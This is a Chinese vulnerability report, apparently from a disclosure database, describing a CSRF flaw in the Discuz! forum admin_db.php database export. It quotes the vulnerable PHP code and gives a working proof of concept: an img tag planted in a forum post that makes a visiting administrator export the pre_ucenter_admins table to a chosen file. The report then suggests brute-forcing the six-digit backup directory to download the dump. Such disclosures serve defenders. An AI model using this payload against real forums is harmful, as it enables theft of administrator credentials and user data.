### 简要描述:
Discuz CSRF脱裤!
广告位 承接代码审计 codescan.cn codescan#yeah.net
### 详细说明:
```
admin_db.php
if(!$backupdir) {
$backupdir = random(6);
@mkdir('./data/backup_'.$backupdir, 0777);//文件夹名是六位随机数
C::t('common_setting')->update('backupdir',$backupdir);/
} else {//这边也没有做fromhash的验证 估计是方便AJAX请求~
DB::query('SET SQL_QUOTE_SHOW_CREATE=0', 'SILENT');
if(!$_GET['filename'] || !preg_match('/^[\w\_]+$/', $_GET['filename'])) {
cpmsg('database_export_filename_invalid', '', 'error');
}
$time = dgmdate(TIMESTAMP);
if($_GET['type'] == 'discuz' || $_GET['type'] == 'discuz_uc') {
$tables = arraykeys2(fetchtablelist($tablepre), 'Name');
} elseif($_GET['type'] == 'custom') {
$tables = array();
if(empty($_GET['setup'])) {
$tables = C::t('common_setting')->fetch('custombackup', true);
} else {
C::t('common_setting')->update('custombackup', empty($_GET['customtables'])? '' : $_GET['customtables']);
$tables = & $_GET['customtables'];
}
if( !is_array($tables) || empty($tables)) {
cpmsg('database_export_custom_invalid', '', 'error');
}
}
$memberexist = array_search(DB::table('common_member'), $tables);
if($memberexist !== FALSE) {
unset($tables[$memberexist]);
array_unshift($tables, DB::table('common_member'));
}
$volume = intval($_GET['volume']) + 1;
$idstring = '# Identify: '.base64_encode("$_G[timestamp],".$_G['setting']['version'].",{$_GET['type']},{$_GET['method']},{$volume},{$tablepre},{$dbcharset}")."\n";
$dumpcharset = $_GET['sqlcharset'] ? $_GET['sqlcharset'] : str_replace('-', '', $_G['charset']);
$setnames = ($_GET['sqlcharset'] && $db->version() > '4.1' && (!$_GET['sqlcompat'] || $_GET['sqlcompat'] == 'MYSQL41')) ? "SET NAMES '$dumpcharset';\n\n" : '';
if($db->version() > '4.1') {
if($_GET['sqlcharset']) {
DB::query('SET NAMES %s', array($_GET['sqlcharset']));
}
if($_GET['sqlcompat'] == 'MYSQL40') {
DB::query("SET SQL_MODE='MYSQL40'");
} elseif($_GET['sqlcompat'] == 'MYSQL41') {
DB::query("SET SQL_MODE=''");
}
}
$backupfilename = './data/'.$backupdir.'/'.str_replace(array('/', '\\', '.', "'"), '', $_GET['filename']);//文件名可控
if($_GET['usezip']) {
require_once './source/class/class_zip.php';
}
if($_GET['method'] == 'multivol') {
$sqldump = '';
$tableid = intval($_GET['tableid']);
$startfrom = intval($_GET['startfrom']);
if(!$tableid && $volume == 1) {
foreach($tables as $table) {
$sqldump .= sqldumptablestruct($table);
}
}
$complete = TRUE;
for(; $complete && $tableid < count($tables) && strlen($sqldump) + 500 < $_GET['sizelimit'] * 1000; $tableid++) {
$sqldump .= sqldumptable($tables[$tableid], $startfrom, strlen($sqldump));
if($complete) {
$startfrom = 0;
}
}
$dumpfile = $backupfilename."-%s".'.sql';
!$complete && $tableid--;
if(trim($sqldump)) {
$sqldump = "$idstring".
"# <?php exit();?>\n".
"# Discuz! Multi-Volume Data Dump Vol.$volume\n".
"# Version: Discuz! {$_G[setting][version]}\n".
"# Time: $time\n".
"# Type: {$_GET['type']}\n".
"# Table Prefix: $tablepre\n".
"#\n".
"# Discuz! Home: http://www.discuz.com\n".
"# Please visit our website for newest infomation about Discuz!\n".
"# --------------------------------------------------------\n\n\n".
"$setnames".
$sqldump;
$dumpfilename = sprintf($dumpfile, $volume);
@$fp = fopen($dumpfilename, 'wb');
@flock($fp, 2);
if(@!fwrite($fp, $sqldump)) {
@fclose($fp);
cpmsg('database_export_file_invalid', '', 'error');
} else {
fclose($fp);
if($_GET['usezip'] == 2) {
$fp = fopen($dumpfilename, "r");
$content = @fread($fp, filesize($dumpfilename));
fclose($fp);
$zip = new zipfile();
$zip->addFile($content, basename($dumpfilename));//写出
$fp = fopen(sprintf($backupfilename."-%s".'.zip', $volume), 'w');
if(@fwrite($fp, $zip->file()) !== FALSE) {
@unlink($dumpfilename);
}
echo $dumpfilename;exit();
fclose($fp);
}
unset($sqldump, $zip, $content);
```
### 漏洞证明:
利用方法
前台发贴插入SRC
<img src="http://127.0.0.1/x32/admin.php?action=db&operation=export&setup=1&scrolltop=&anchor=&type=custom&customtables%5B%
5D=pre_ucenter_admins&method=multivol&sizelimit=2048&extendins=0&sqlcompat=&usehex=1&usezip=0&filename=ssccad&exportsubmit=%CC%
E1%BD%BB22">
其中表明和文件名可控
缺少一个dir的name
但是dir是一个6位纯数字
data/backup_123456/xxx.sql
这样我们可以对这个数字进行暴力破解
就可以了
6位数字 跑个一宿还是能出来的 直接脱裤啊
[<img src="https://images.seebug.org/upload/201406/141054571d7aa1a1c63e73950d3f712b064aecc1.jpg" alt="QQ截图20140614105047.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/141054571d7aa1a1c63e73950d3f712b064aecc1.jpg)
京公网安备 11010502034610号
暂无评论